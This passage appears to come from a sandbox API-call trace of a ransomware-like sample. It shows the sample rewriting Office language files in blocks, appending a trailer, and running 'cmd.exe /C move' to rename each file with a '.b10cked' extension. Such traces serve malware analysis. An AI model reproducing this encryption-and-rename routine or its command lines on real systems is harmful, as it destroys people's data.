lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0152.999] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xcaf, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xcaf, lpOverlapped=0x0) returned 1 [0152.999] SetFilePointer (in: hFile=0x114, lDistanceToMove=-126127, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1ecb1 [0152.999] ReadFile (in: hFile=0x114, lpBuffer=0x14849d8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x14849d8*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0152.999] ReadFile (in: hFile=0x114, lpBuffer=0x14849d8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x14849d8*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0153.000] ReadFile (in: hFile=0x114, lpBuffer=0x14849d8, nNumberOfBytesToRead=0xcaf, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x14849d8*, 
lpNumberOfBytesRead=0x12ec08*=0xcaf, lpOverlapped=0x0) returned 1 [0153.001] SetFilePointer (in: hFile=0x114, lDistanceToMove=-126127, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1ecb1 [0153.001] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0153.001] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0153.002] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xcaf, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xcaf, lpOverlapped=0x0) returned 1 [0153.006] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GRINTL32.REST.trx_dll", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0153.006] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GRINTL32.REST.trx_dll", cchWideChar=21, lpMultiByteStr=0x1328744, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GRINTL32.REST.trx_dll", lpUsedDefaultChar=0x0) returned 21 [0153.007] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x3d960 [0153.007] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0153.007] CloseHandle (hObject=0x114) returned 1 [0153.009] GetShortPathNameW (in: 
lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.REST.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL~2.TRX") returned 0x3c [0153.010] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\") returned 0x30 [0153.010] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL32.REST.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL32.REST.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xddc, dwThreadId=0xd9c)) returned 1 [0153.016] CloseHandle (hObject=0x110) returned 1 [0153.016] CloseHandle (hObject=0x114) returned 1 [0153.016] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0153.016] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: 
lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0153.016] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount2=52) returned 2 [0153.016] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0153.017] ReleaseMutex (hMutex=0xf8) returned 1 [0153.017] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0153.017] ReleaseMutex (hMutex=0xf8) returned 1 [0153.017] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0153.017] ReleaseMutex (hMutex=0xf8) returned 1 [0153.017] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0153.017] ReleaseMutex (hMutex=0xf8) returned 1 [0153.017] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MAPIR.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\mapir.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0153.018] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.018] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x49f60 [0153.018] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.018] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=20980726906) returned 1 [0153.018] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.018] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x49f60 [0153.018] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.018] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.018] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x49f60 [0153.018] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.018] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.018] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x49f60 [0153.019] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.019] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.019] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x49f60 [0153.019] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.019] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.019] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x49f60 [0153.019] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.019] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.019] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x49f60 [0153.019] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.019] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.019] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x49f60 [0153.019] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.019] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.019] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x49f60 [0153.020] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.020] SetFilePointer (in: 
hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.020] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x49f60 [0153.020] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.020] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x49a78 [0153.020] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0153.106] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0153.106] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0153.106] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x49f60 [0153.106] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0153.106] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0153.106] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0153.106] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, 
dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x49f60 [0153.106] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0153.106] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0153.106] ReadFile (in: hFile=0x114, lpBuffer=0x14849d8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x14849d8*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0153.140] ReadFile (in: hFile=0x114, lpBuffer=0x14849d8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x14849d8*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0153.141] ReadFile (in: hFile=0x114, lpBuffer=0x14849d8, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x14849d8*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0153.143] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0153.143] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0153.143] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0153.143] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0153.143] 
SetFilePointer (in: hFile=0x114, lDistanceToMove=-131072, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x29f60 [0153.144] ReadFile (in: hFile=0x114, lpBuffer=0x14849d8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x14849d8*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0153.144] ReadFile (in: hFile=0x114, lpBuffer=0x14849d8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x14849d8*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0153.145] ReadFile (in: hFile=0x114, lpBuffer=0x14849d8, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x14849d8*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0153.147] SetFilePointer (in: hFile=0x114, lDistanceToMove=-131072, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x29f60 [0153.147] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0153.147] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0153.148] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0153.151] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MAPIR.DLL.trx_dll", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 
17 [0153.151] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MAPIR.DLL.trx_dll", cchWideChar=17, lpMultiByteStr=0x1328744, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MAPIR.DLL.trx_dll", lpUsedDefaultChar=0x0) returned 17 [0153.151] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x49f60 [0153.152] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0153.152] CloseHandle (hObject=0x114) returned 1 [0153.154] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MAPIR.DLL.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MAPIRD~1.TRX") returned 0x3c [0153.155] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\") returned 0x30 [0153.155] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MAPIRD~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MAPIR.DLL.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: 
lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MAPIRD~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MAPIR.DLL.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xd6c, dwThreadId=0xe94)) returned 1 [0153.168] CloseHandle (hObject=0x110) returned 1 [0153.168] CloseHandle (hObject=0x114) returned 1 [0153.168] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0153.168] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0153.168] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount2=52) returned 2 [0153.168] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0153.168] ReleaseMutex (hMutex=0xf8) returned 1 [0153.168] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0153.168] ReleaseMutex (hMutex=0xf8) returned 1 [0153.168] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0153.168] ReleaseMutex (hMutex=0xf8) returned 1 [0153.168] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0153.168] ReleaseMutex (hMutex=0xf8) returned 1 [0153.168] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MOR6INT.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\mor6int.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 
[0153.169] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.169] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc160 [0153.169] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.169] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=20995846402) returned 1 [0153.169] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.169] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc160 [0153.169] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.169] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.169] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc160 [0153.170] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.170] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0153.170] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0xc160 [0153.170] 
